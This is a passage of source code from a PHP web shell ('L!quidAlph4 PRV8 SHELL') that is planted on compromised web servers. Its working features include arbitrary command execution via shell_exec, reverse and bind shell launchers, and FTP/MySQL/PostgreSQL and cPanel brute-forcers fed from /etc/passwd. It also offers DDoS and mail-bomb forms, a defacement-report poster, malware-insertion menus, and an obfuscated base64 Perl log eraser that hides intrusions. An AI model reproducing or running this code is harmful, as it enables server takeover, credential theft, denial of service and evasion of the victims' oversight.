4974 if(!function_exists('curl_version'))
4975 {
4976 echo "<pre style='margin-top:5px'><center><font >PHP CURL NOT EXIST</font></center></pre>";
4977 }
4978 ?>
4979 <center><font size="4">Zone-h Poster</font></center>
4980 <form action="<?php echo $self; ?>" method="post">
4981 <table align="center" cellpadding="5" border="0">
4982 <tr>
4983 <td>
4984 <input type="text" name="defacer" value="Attacker" class="box" /></td></tr>
4985 <tr><td>
4986 <select name="hackmode" class="box">
4987 <option >--------SELECT--------</option>
4988 <option value="1">known vulnerability (i.e. unpatched system)</option>
4989 <option value="2" >undisclosed (new) vulnerability</option>
4990 <option value="3" >configuration / admin. mistake</option>
4991 <option value="4" >brute force attack</option>
4992 <option value="5" >social engineering</option>
4993 <option value="6" >Web Server intrusion</option>
4994 <option value="7" >Web Server external module intrusion</option>
4995 <option value="8" >Mail Server intrusion</option>
4996 <option value="9" >FTP Server intrusion</option>
4997 <option value="10" >SSH Server intrusion</option>
4998 <option value="11" >Telnet Server intrusion</option>
4999 <option value="12" >RPC Server intrusion</option>
5000 <option value="13" >Shares misconfiguration</option>
5001 <option value="14" >Other Server intrusion</option>
5002 <option value="15" >SQL Injection</option>
5003 <option value="16" >URL Poisoning</option>
5004 <option value="17" >File Inclusion</option>
5005 <option value="18" >Other Web Application bug</option>
5006 <option value="19" >Remote administrative panel access bruteforcing</option>
5007 <option value="20" >Remote administrative panel access password guessing</option>
5008 <option value="21" >Remote administrative panel access social engineering</option>
5009 <option value="22" >Attack against administrator(password stealing/sniffing)</option>
5010 <option value="23" >Access credentials through Man In the Middle attack</option>
5011 <option value="24" >Remote service password guessing</option>
5012 <option value="25" >Remote service password bruteforce</option>
5013 <option value="26" >Rerouting after attacking the Firewall</option>
5014 <option value="27" >Rerouting after attacking the Router</option>
5015 <option value="28" >DNS attack through social engineering</option>
5016 <option value="29" >DNS attack through cache poisoning</option>
5017 <option value="30" >Not available</option>
5018 </select>
5019 </td></tr>
5020 <tr><td>
5021 <select name="reason" class="box">
5022 <option >--------SELECT--------</option>
5023 <option value="1" >Heh...just for fun!</option>
5024 <option value="2" >Revenge against that website</option>
5025 <option value="3" >Political reasons</option>
5026 <option value="4" >As a challenge</option>
5027 <option value="5" >I just want to be the best defacer</option>
5028 <option value="6" >Patriotism</option>
5029 <option value="7" >Not available</option>
5030 </select></td></tr>
5031 <tr><td>
5032 <textarea name="domain" class="box" cols="47" rows="9">List Of Domains</textarea></td></tr>
5033 <tr><td>
5034 <input type="button" onClick="zoneh(defacer.value,hackmode.value,reason.value,domain.value)" class="but" value="Send Now !" /></td></tr></table>
5035 </form><div id="showzone"></div>
5036 <?php }
5037//DDos
5038 else if(isset($_GET['dos']))
5039 {
5040 ?>
5041 <form method="GET">
5042 <table id="margins">
5043 <tr>
5044 <td width="400" class="title">
5045 IP
5046 </td>
5047 <td>
5048 <input class="box" name="myip" value="127.0.0.1" onFocus="if(this.value == '127.0.0.1')this.value = '';" onBlur="if(this.value=='')this.value='127.0.0.1';"/>
5049 </td>
5050 </tr>
5051
5052 <tr>
5053 <td class="title">
5054 Port
5055 </td>
5056 <td>
5057 <input class="box" name="port" value="80" onFocus="if(this.value == '80')this.value = '';" onBlur="if(this.value=='')this.value='80';"/>
5058 </td>
5059 </tr>
5060
5061 <tr>
5062 <td class="title">
5063 Timeout <font >(Time in seconds)</font>
5064 </td>
5065 <td>
5066 <input type="text" class="box" name="timeout" value="5" onFocus="if(this.value == '5')this.value = '';" onBlur="if(this.value=='')this.value='5';" />
5067 </td>
5068 </tr>
5069 <tr>
5070 <td class="title">
5071 Execution Time <font >(Time in seconds)</font>
5072 </td>
5073 <td>
5074 <input type="text" class="box" name="exTime" value="10" onFocus="if(this.value == '10')this.value = '';" onBlur="if(this.value=='')this.value='10';"/>
5075 </td>
5076 </tr>
5077 <tr>
5078 <td class="title">
5079 No of Bytes per/packet
5080 </td>
5081 <td>
5082 <input type="text" class="box" name="noOfBytes" value="999999" onFocus="if(this.value == '999999')this.value = '';" onBlur="if(this.value=='')this.value='999999';"/>
5083 </td>
5084 </tr>
5085 <tr>
5086 <td rowspan="2">
5087 <input style="margin : 20px; margin-left: 500px; padding : 10px; width: 100px;" type="button" onClick="dos('dosser',myip.value,port.value,timeout.value,exTime.value,noOfBytes.value,'null')" class="but" value=" > Fuck < "/>
5088 </td>
5089 </tr>
5090 </table>
5091 </form><div id="showdos"></div>
5092 <?php
5093}
5094else if(isset($_GET['mailbomb']))
5095{ ?>
5096 <center><table><tr><td><a href=javascript:void(0) onClick="getdata('bomb')"><font class=txt size="4">| Mail Bomber |</font></a></td>
5097 <td><a href=javascript:void(0) onClick="getdata('mail')"><font class=txt size="4">| Mass Mailer |</font></a></td></tr></table></center><br><div id=showdata></div>
5098<?php
5099}
5100else if(isset($_GET['tools']))
5101 {
5102 ?>
5103 <center><br><form onSubmit="getport(host.value,protocol.value);return false;">
5104 <table cellpadding="5" border="3" style="border-color:#333333; width:50%;">
5105 <tr>
5106 <td colspan="2" align="center"><b><font size='4'>Port Scanner<br></font></b></td>
5107 </tr>
5108 <tr>
5109 <td align="center">
5110 <input class="sbox" type='text' name='host' value='<?php echo $_SERVER["SERVER_ADDR"]; ?>' >
5111 </td>
5112 <td align="center">
5113 <select class="sbox" name='protocol'>
5114 <option value='tcp'>tcp</option>
5115 <option value='udp'>udp</option>
5116 </select>
5117 </td>
5118 <tr>
5119 <td colspan="2" align="center"><input class="but" type='button' onClick="getport(host.value,protocol.value)" value='Scan Ports'></td>
5120 </tr>
5121 </form>
5122 <tr><td colspan=2><div id="showports"></div>
5123 </td></tr></table>
5124
5125 <br>
5126 <form onSubmit="bruteforce(prototype.value,serverport.value,login.value,dict.value);return false;">
5127 <table cellpadding="5" border="2" style="border-color:#333333; width:50%;">
5128 <tr>
5129 <td colspan="2" align="center"><font size="4">BruteForce</font></td>
5130 </tr>
5131 <tr>
5132 <td>Type : </td>
5133 <td>
5134 <select name="prototype" class="sbox">
5135 <option value="ftp">FTP</option>
5136 <option value="mysql">MYSQL</option>
5137 <option value="postgresql">PostgreSql</option>
5138 </select>
5139 </td>
5140 </tr>
5141 <tr>
5142 <td>Server <b>:</b> Port : </td>
5143 <td><input type="text" name="serverport" value="<?php echo $_SERVER["SERVER_ADDR"]; ?>" class="sbox"></td>
5144 </tr>
5145 <tr>
5146 <td valign="middle">Brute type : </td>
5147 <td><label><input type=radio name=mytype value="1" checked> /etc/passwd</label><label><input type=checkbox id="reverse" name=reverse value=1 checked> reverse (login -> nigol)</label><hr color="#1B1B1B">
5148 <label><input type=radio name=mytype value="2"> Dictionary</label><br>
5149 Login : <input type="text" name="login" value="root" class="sbox"><br>
5150 Dictionary : <input type="text" name="dict" value="<?php echo getcwd() . $directorysperator; ?>passwd.txt" class="sbox">
5151 </td>
5152 </tr>
5153 <tr>
5154 <td colspan="2" align="center"><input type="button" onClick="bruteforce(prototype.value,serverport.value,login.value,dict.value)" value="Attack >>" class="but"></td>
5155 </tr>
5156 </form><tr><td colspan="2" id="showbrute"></td></tr>
5157 </table>
5158 </center><br>
5159 <?php
5160}
5161else if (isset($_GET["phpc"]))
5162{
5163 ?>
5164 <div id="showresult"></div>
5165 <form name="frm">
5166 <textarea name="code" class="box" cols="120" rows="10">phpinfo();</textarea>
5167 <br /><br />
5168 <input name="submit" value="Execute This COde! " class="but" onClick="execode(code.value)" type="button" />
5169 <label><input type="checkbox" id="intext" name="intext" value="disp"> <font class=txt size="3">Display in Textarea</font></label>
5170 </form>
5171 <?php
5172}
5173else if(isset($_GET["exploit"]))
5174{
5175 if(!isset($_GET["rootexploit"]))
5176 {
5177 ?>
5178 <center>
5179 <form action="<?php echo $self; ?>" method="get" target="_blank">
5180 <input type="hidden" name="exploit">
5181 <table border="1" cellpadding="5" cellspacing="4" style="width:50%;border-color:#333333;">
5182 <tr>
5183 <td style="height:60px;">
5184 <font size="4" class=txt>Select Website</font></td><td>
5185 <p><select id="rootexploit" name="rootexploit" class="box">
5186 <option value="exploit-db">Exploit-db</option>
5187 <option value="packetstormsecurity">Packetstormsecurity</option>
5188 <option value="exploitsearch">Exploitsearch</option>
5189 <option value="shodanhq">Shodanhq</option>
5190 </select></p></td></tr><tr><td colspan="2" align="center" style="height:40px;">
5191 <input type="submit" value="Search" class="but"></td></tr></table>
5192 </form></center><br>
5193
5194 <?php
5195 }
5196 else
5197 {
5198 //exploit search
5199 $Lversion = php_uname(r);
5200 $OSV = php_uname(s);
5201 if(eregi('Linux',$OSV))
5202 {
5203 $Lversion=substr($Lversion,0,6);
5204 if($_GET['rootexploit'] == "exploit-db")
5205 {
5206 header("Location:http://www.exploit-db.com/search/?action=search&filter_page=1&filter_description=$Lversion&filter_exploit_text=&filter_author=&filter_platform=16&filter_type=2&filter_lang_id=0&filter_port=&filter_osvdb=&filter_cve=");
5207 }
5208 else if($_GET['rootexploit'] == "packetstormsecurity")
5209 {
5210 header("Location:http://www.packetstormsecurity.org/search/?q=Linux+Kernel+$Lversion");
5211 }
5212 else if($_GET['rootexploit'] == "exploitsearch")
5213 {
5214 header("Location:http://exploitsearch.com/search.html?cx=000255850439926950150%3A_vswux9nmz0&cof=FORID%3A10&q=Linux+Kernel+$Lversion");
5215 }
5216 else if($_GET['rootexploit'] == "shodanhq")
5217 {
5218 header("Location:https://exploits.shodan.io/?q=$Lversion+platform:\"linux\"");
5219 }
5220 }
5221 else
5222 {
5223 $Lversion=substr($Lversion,0,3);
5224 if($_GET['rootexploit'] == "exploit-db")
5225 {
5226 header("Location:http://www.exploit-db.com/search/?action=search&filter_page=1&filter_description=$OSV&filter_exploit_text=&filter_author=&filter_platform=16&filter_type=2&filter_lang_id=0&filter_port=&filter_osvdb=&filter_cve=");
5227 }
5228 else if($_GET['rootexploit'] == "packetstormsecurity")
5229 {
5230 header("Location:http://www.packetstormsecurity.org/search/?q=$OSV+Lversion");
5231 }
5232 else if($_GET['rootexploit'] == "exploitsearch")
5233 {
5234 header("Location:http://exploitsearch.com/search.html?cx=000255850439926950150%3A_vswux9nmz0&cof=FORID%3A10&q=$OSV+Lversion");
5235 }
5236 else if($_GET['rootexploit'] == "shodanhq")
5237 {
5238 header("Location:https://exploits.shodan.io/?q=$OSV+platform:\"windows\"");
5239 }
5240 }
5241 //End of Exploit search
5242 }
5243}
5244// Connect
5245else if(isset($_REQUEST['connect']))
5246{
5247 ?>
5248 <form action='<?php echo $self; ?>' method='POST' >
5249 <table style="width:50%" align="center" >
5250 <tr>
5251 <th colspan="1" width="50px">Reverse Shell</th>
5252 <th colspan="1" width="50px">Bind Shell</th>
5253 </tr>
5254 <tr>
5255 <td>
5256 <table style="border-spacing: 6px;">
5257 <tr>
5258 <td>IP </td>
5259 <td>
5260 <input type="text" class="box" style="width: 200px;" name="ip" value="<?php yourip();?>" />
5261 </td>
5262 </tr>
5263 <tr>
5264 <td>Port </td>
5265 <td><input style="width: 200px;" class="box" name="port" size='5' value="9891"/></td>
5266 </tr>
5267 <tr>
5268 <td style="vertical-align:top;">Use:</td>
5269 <td><select style="width: 95px;" name="lang" class="sbox">
5270 <option value="perl">Perl</option>
5271 <option value="python">Python</option>
5272 <option value="php">PHP</option>
5273 </select>
5274 <input type="submit" style="width: 90px;" class="but" value="Connect!" name="backconnect"/></td>
5275 </tr>
5276 </table> </form>
5277 </td>
5278
5279 <td style="vertical-align:top;">
5280 <form method='post' >
5281 <table style="border-spacing: 6px;">
5282 <tr>
5283 <td>Port</td>
5284 <td>
5285 <input style="width: 200px;" class="box" name="port" value="9891" />
5286 </td>
5287 </tr>
5288 <tr>
5289 <td>Password </td>
5290 <td>
5291 <input style="width: 200px;" class="box" name="passwd" value="Dhanush"/>
5292 </td>
5293 <tr>
5294 <td>Using</td>
5295 <td>
5296 <select style="width: 95px;" name="lang" id="lang" class="sbox">
5297 <option value="perl">Perl</option>
5298 <option value="c">C</option>
5299 </select>
5300 <input style="width: 90px;" class="but" type="submit" name="backdoor" value=" Bind "/></td>
5301 </tr>
5302 </table>
5303 </td>
5304 </form>
5305 </tr>
5306 <tr><td colspan=2>Click "Connect" only after open port for it.Use NetCat, run "nc -l -n -v -p 9891"!<br>Click "Bind", use netcat and give it the command 'nc <?php yourip(); ?> 9891"!</td></tr>
5307 </table>
5308
5309 <?php
5310 }
5311else if(isset($_REQUEST['subdomain']))
5312{
5313 ?>
5314 <center><form>
5315 <table>
5316 <tr>
5317 <td>Cpanel user : </td>
5318 <td><input type="text" name="cpaneluser" value="<?php echo get_current_user(); ?>" class="box" /></td>
5319 </tr>
5320 <tr>
5321 <td>Cpanel password : </td>
5322 <td><input type="password" name="cpanelpass" class="box" /></td>
5323 </tr>
5324 <tr>
5325 <td>Number of Subdomain : </td>
5326 <td><input type="text" name="noofsubdomain" class="box" value="10" /></td>
5327 </tr>
5328 <tr>
5329 <td valign="top">Index : </td>
5330 <td><textarea rows="7" cols="54" name="subindex" class="box">[+] LA was here [+]</textarea></td>
5331 </tr>
5332 <tr>
5333 <td></td>
5334 <td><input type="button" value=" go " class="but" onClick="createsubdomain(cpaneluser.value,cpanelpass.value,noofsubdomain.value,subindex.value)" /></td>
5335 </tr>
5336 </table></center></form><br>
5337 <div id="showmydata"></div>
5338 <?php
5339}
5340else if(isset($_REQUEST['404']))
5341{
5342 ?>
5343 <center><table><tr><td><a href=javascript:void(0) onClick="getdata('404new')"><font class=txt size="4">| Set Your 404 Page |</font></a></td>
5344 <td><a href=javascript:void(0) onClick="getdata('404page')"><font class=txt size="4">| Set Specified 404 Page |</font></a></td>
5345 </tr></table></center><br>
5346 <div id="showdata"></div>
5347 <?php
5348}
5349else if(isset($_GET['about']))
5350 { ?>
5351 <center>
5352 <p><font size=6><u>L!quidAlph4 PRV8 SHELL</u></font><br>
5353 <font size=5>CODED BY <a href="https://www.facebook.com/breatheless2000"> L!quidAlph4 </a></font>
5354 <div style='font-family: Courier New; font-size: 10px;'><font class=txt ><pre>
5355
5356
5357 .. .. ••••••• /----------
5358 | V | • • / | Ι...\
5359 | | ••••••• / | Ι \
5360 | | / --| | Ι \
5361 | | |-----| / / | | Ι \
5362 | | | | -----/ | | Ι \
5363 | | | | | | Ι |\ \
5364 | | | | | | Ι | \ |
5365 | | | | |---------| |VV¦ ¦VV| | | Ι | / |
5366 | | | | ||-------|| | ¦ ¦ | | | Ι |/ /
5367 | | | | || || | ¦ ¦ | | | Ι /
5368 | ----------.| | || || | ¦ ¦ | | | Ι /
5369 | / | | ||-------|| | --------- | | | Ι /
5370 ------------/ |-----| |---------| |-----------| | | Ι /
5371 ↓↓↓↓ ....... Ι.../
5372 ↓↓↓↓
5373 ↓↓↓↓
5374 ↓↓↓↓
5375 ↓↓↓↓ /---/
5376 ↓↓↓↓/ /
5377 |------/
5378
5379
5380 ]|I{•-------------------------» I AM THE LORD «---------------------------•}I|[
5381
5382
5383 </pre></font></div></center>
5384 <font class="om">This Shell is created for checking the vulnerability and security of any web server or website. <br> This shell provides you almost every facility that the security analyst need for penetration testing. <br> This script is only coded for education purpose or testing on your own server. <br> The developers of the script is not responsible for any damage or misuse of it.<br> Where there is a shell there is a way </font><br><br><center><font size=5>GREETS TO : <a href="http://facebook.com/734M.H5H"> HELL SHIELD HACKERS </font></center><br>
5385 <?php }
5386else if(isset($_GET['database']))
5387{ ?>
5388 <form onSubmit="mydatabase(server.value,username.value,password.value);return false;">
5389 <table id="datatable" style="width:90%;" cellpadding="4" align="center">
5390 <tr>
5391 <td colspan="2">Connect To Database</td>
5392 </tr>
5393 <tr>
5394 <td>Server Address :</td>
5395 <td><input type="text" class="box" name="server" value="localhost"></td>
5396 </tr>
5397 <tr>
5398 <td>Username :</td>
5399 <td><input type="text" class="box" name="username" value="root"></td>
5400 </tr>
5401 <tr>
5402 <td>Password:</td>
5403 <td><input type="text" class="box" name="password" value=""></td>
5404 </tr>
5405
5406 <tr>
5407 <td></td>
5408 <td><input type="button" onClick="mydatabase(server.value,username.value,password.value)" value=" Connect " name="executeit" class="but"></td>
5409 </tr>
5410 </table>
5411 </form>
5412 <div id="showsql"></div>
5413<?php
5414}
5415// Cpanel Cracker
5416 else if(isset($_REQUEST['cpanel']))
5417 {
5418 $cpanel_port="2082";
5419 $connect_timeout=5;
5420 ?>
5421 <center>
5422 <form method=post>
5423 <table class="btmtbl" style="width:50%;" border=1 cellpadding=4>
5424 <tr>
5425 <td align=center>User names</td><td align=center>Password</td>
5426 </tr>
5427 <tr>
5428 <td align=center><textarea name=username rows=25 cols=22 class=box><?php
5429 if($os != "Windows")
5430 {
5431 if(@file('/etc/passwd'))
5432 {
5433 $users = file('/etc/passwd');
5434 foreach($users as $user)
5435 {
5436 $user = explode(':', $user);
5437 echo $user[0] . "\n";
5438 }
5439 }
5440 else
5441 {
5442 $temp = "";
5443 $val1 = 0;
5444 $val2 = 1000;
5445 for(;$val1 <= $val2;$val1++)
5446 {
5447 $uid = @posix_getpwuid($val1);
5448 if ($uid)
5449 $temp .= join(':',$uid)."\n";
5450 }
5451
5452 $temp = trim($temp);
5453
5454 if($file5 = fopen("test.txt","w"))
5455 {
5456 fputs($file5,$temp);
5457 fclose($file5);
5458
5459 $file = fopen("test.txt", "r");
5460 while(!feof($file))
5461 {
5462 $s = fgets($file);
5463 $matches = array();
5464 $t = preg_match('/\/(.*?)\:\//s', $s, $matches);
5465 $matches = str_replace("home/","",$matches[1]);
5466 if(strlen($matches) > 12 || strlen($matches) == 0 || $matches == "bin" || $matches == "etc/X11/fs" || $matches == "var/lib/nfs" || $matches == "var/arpwatch" || $matches == "var/gopher" || $matches == "sbin" || $matches == "var/adm" || $matches == "usr/games" || $matches == "var/ftp" || $matches == "etc/ntp" || $matches == "var/www" || $matches == "var/named")
5467 continue;
5468 echo $matches;
5469 }
5470 fclose($file);
5471 }
5472 }
5473 }
5474
5475 ?></textarea></td><td align=center><textarea name=password rows=25 cols=22 class=box></textarea></td>
5476 </tr>
5477 <tr>
5478 <td align=center colspan=2><input type="submit" name="cpanelattack" value=" Go " class=but></td>
5479 </tr>
5480 </table>
5481 </form>
5482 </center>
5483 <?php
5484}
5485else if(isset($_REQUEST['malattack']))
5486{
5487 ?><input type="hidden" id="malpath" value="<?php echo $_GET["dir"]; ?>">
5488 <center><table><tr><td><a href=# onClick="getdata('malware')"><font class=txt size="4">| Malware Attack |</font></a></td>
5489 <td><a href=# onClick="getdata('codeinsert')"><font class=txt size="4">| Insert Own Code |</font></a></td></tr></table></center><br>
5490 <div id="showdata"></div>
5491 <?php
5492}
5493else if(isset($_GET["com"]))
5494{
5495 echo "<br>";
5496 ob_start();
5497 eval("phpinfo();");
5498 $b = ob_get_contents();
5499 ob_end_clean();
5500 $a = strpos($b,"<body>")+6; // yeah baby,, your body is wonderland ;-)
5501 $z = strpos($b,"</body>");
5502 $s_result = "<div class='myphp'>".substr($b,$a,$z-$a)."</div>";
5503 echo $s_result;
5504}
5505else if(isset($_GET['execute']))
5506{
5507 $comm = $_GET['execute'];
5508 chdir($_GET['executepath']);
5509 $check = shell_exec($comm);
5510
5511 echo "<BR><center><textarea id=showexecute cols=100 rows=20 class=box>" . $check . "</textarea></center>";
5512
5513 ?>
5514 <BR><BR><center><form onSubmit="executemyfn('<?php echo addslashes($_GET['executepath']); ?>',execute.value);return false;">
5515 <input type="text" class="box" name="execute">
5516 <input type="button" onClick="executemyfn('<?php echo addslashes($_GET['executepath']); ?>',execute.value)" value="Execute" class="but">
5517 <input type="button" onClick="cancel()" value="cancel" class="but" /></form></center><BR>
5518 <?php
5519}
5520else if(isset($_GET['mycmd']))
5521{
5522 if($_GET['mycmd']=="logeraser")
5523 {
5524 $erase = gzinflate(base64_decode("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"));
5525 if(is_writable("."))
5526 {
5527 if($openp = fopen(getcwd()."/logseraser.pl", 'w'))
5528 {
5529 fwrite($openp, $erase);
5530 fclose($openp);
5531 passthru("perl logseraser.pl linux");
5532 unlink("logseraser.pl");
5533 echo "<center><font color=#FFFFFF size=3>Logs Cleared</font></center>";
5534 }
5535 } else
5536 {
5537 if($openp = fopen("/tmp/logseraser.pl", 'w'))
5538 {
5539 fwrite($openp, $erase)or die("Error");
5540 fclose($openp);
5541 $aidx = passthru("perl logseraser.pl linux");
5542 unlink("logseraser.pl");
5543 echo "<center><font color=#FFFFFF size=3>Logs Cleared</font></center>";
5544 }
5545 }
5546 }
5547 else
5548 {
5549 $check = shell_exec($_GET['mycmd']);
5550 echo "<center><textarea cols=120 rows=20 class=box>" . $check . "</textarea></center>";
5551
5552 }
5553}
5554else if(isset($_GET['prototype']))
5555{
5556 echo '<h1>Results</h1><div><span>Type:</span> '.htmlspecialchars($_GET['prototype']).' <span><br>Server:</span> '.htmlspecialchars($_GET['serverport']).'<br>';
5557 if( $_GET['prototype'] == 'ftp' )
5558 {
5559 function BruteFun($ip,$port,$login,$pass)
5560 {
5561 $fp = @ftp_connect($ip, $port?$port:21);
5562 if(!$fp) return false;
5563 $res = @ftp_login($fp, $login, $pass);
5564 @ftp_close($fp);
5565 return $res;
5566 }
5567 }
5568 elseif( $_GET['prototype'] == 'mysql' )
5569 {
5570 function BruteFun($ip,$port,$login,$pass)
5571 {
5572 $res = @mysql_connect($ip.':'.$port?$port:3306, $login, $pass);
5573 @mysql_close($res);
5574 return $res;
5575 }
5576 }
5577 elseif( $_GET['prototype'] == 'pgsql' )
5578 {
5579 function BruteFun($ip,$port,$login,$pass)
5580 {
5581 $str = "host='".$ip."' port='".$port."' user='".$login."' password='".$pass."' dbname=postgres";
5582 $res = @pg_connect($str);
5583 @pg_close($res);
5584 return $res;
5585 }
5586 }
5587
5588 $success = 0;
5589 $attempts = 0;
5590 $server = explode(":", $_GET['server']);
5591
5592 if($_GET['type'] == 1)
5593 {
5594 $temp = @file('/etc/passwd');
5595 if( is_array($temp))
5596 foreach($temp as $line)
5597 {
5598 $line = explode(":", $line);
5599 ++$attempts;
5600 if(BruteFun(@$server[0],@$server[1], $line[0], $line[0]) )
5601 {
5602 $success++;
5603 echo '<b>'.htmlspecialchars($line[0]).'</b>:'.htmlspecialchars($line[0]).'<br>';
5604 }
5605 if(@$_GET['reverse'])
5606 {
5607 $tmp = "";
5608 for($i=strlen($line[0])-1; $i>=0; --$i)
5609 $tmp .= $line[0][$i];
5610 ++$attempts;
5611 if(BruteFun(@$server[0],@$server[1], $line[0], $tmp) )
5612 {
5613 $success++;
5614 echo '<b>'.htmlspecialchars($line[0]).'</b>:'.htmlspecialchars($tmp);
5615 }
5616 }
5617 }
5618 }
5619 elseif($_GET['type'] == 2)
5620 {
5621 $temp = @file($_GET['dict']);
5622 if( is_array($temp) )
5623 foreach($temp as $line)
5624 {
5625 $line = trim($line);
5626 ++$attempts;
5627 if(BruteFun($server[0],@$server[1], $_GET['login'], $line) )
5628 {
5629 $success++;
5630 echo '<b>'.htmlspecialchars($_GET['login']).'</b>:'.htmlspecialchars($line).'<br>';
5631 }
5632 }
5633 }
5634 echo "<span>Attempts:</span> <font class=txt>$attempts</font> <span>Success:</span> <font class=txt>$success</font></div>";
5635}
5636// Execute Query
5637else if(isset($_GET["executeit"]))
5638{
5639 if(isset($_GET['username']) && isset($_GET['server']))
5640 {
5641 $dbserver = $_GET['server'];
5642 $dbuser = $_GET['username'];
5643 $dbpass = $_GET['password'];
5644 if(mysql_connect($dbserver,$dbuser,$dbpass))
5645 {
5646 setcookie("dbserver", $dbserver);
5647 setcookie("dbuser", $dbuser);
5648 setcookie("dbpass", $dbpass);
5649
5650 listdatabase();
5651 }
5652 else
5653 echo "cannotconnect";
5654 }
5655}
5656else if(isset($_GET['action']) && isset($_GET['dbname']))
5657
5658
5659 {
5660 if($_GET['action'] == "createDB")
5661 {
5662 $dbname = $_GET['dbname'];
5663 $dbserver = $_COOKIE["dbserver"];
5664 $dbuser = $_COOKIE["dbuser"];
5665 $dbpass = $_COOKIE["dbpass"];
5666 $mysqlHandle = mysql_connect($dbserver, $dbuser, $dbpass);
5667 mysql_query("create database $dbname",$mysqlHandle);
5668 listdatabase();
5669 }
5670 if($_GET['action'] == 'dropDB')
5671 {
5672 $dbname = $_GET['dbname'];
5673 $dbserver = $_COOKIE["dbserver"];
5674 $dbuser = $_COOKIE["dbuser"];
5675 $dbpass = $_COOKIE["dbpass"];
5676 $mysqlHandle = mysql_connect($dbserver, $dbuser, $dbpass);
5677 mysql_query("drop database $dbname",$mysqlHandle);
5678 mysql_close($mysqlHandle);
5679 listdatabase();
5680 }
5681
5682 if($_GET['action'] == 'listTables')
5683 {
5684 listtable();
5685 }
5686
5687 // Create Tables
5688 if($_GET['action'] == "createtable")
5689 {
5690 $dbserver = $_COOKIE["dbserver"];
5691 $dbuser = $_COOKIE["dbuser"];
5692 $dbpass = $_COOKIE["dbpass"];
5693 $dbname = $_GET['dbname'];
5694 $tablename = $_GET['tablename'];
5695 $mysqlHandle = mysql_connect ($dbserver, $dbuser, $dbpass);
5696 mysql_select_db($dbname);
5697 mysql_query("CREATE TABLE $tablename ( no INT )");
5698 listtable();
5699 }
5700
5701 // Drop Tables
5702 if($_GET['action'] == "dropTable")
5703 {
5704 $dbserver = $_COOKIE["dbserver"];
5705 $dbuser = $_COOKIE["dbuser"];
5706 $dbpass = $_COOKIE["dbpass"];
5707 $dbname = $_GET['dbname'];
5708 $tablename = $_GET['tablename'];
5709 $mysqlHandle = mysql_connect ($dbserver, $dbuser, $dbpass);
5710 mysql_select_db($dbname);
5711 mysql_query("drop table $tablename");
5712 listtable();
5713 }
5714
5715 // Empty Tables
5716 if($_GET['action'] == "empty")
5717 {
5718 $dbserver = $_COOKIE["dbserver"];
5719 $dbuser = $_COOKIE["dbuser"];
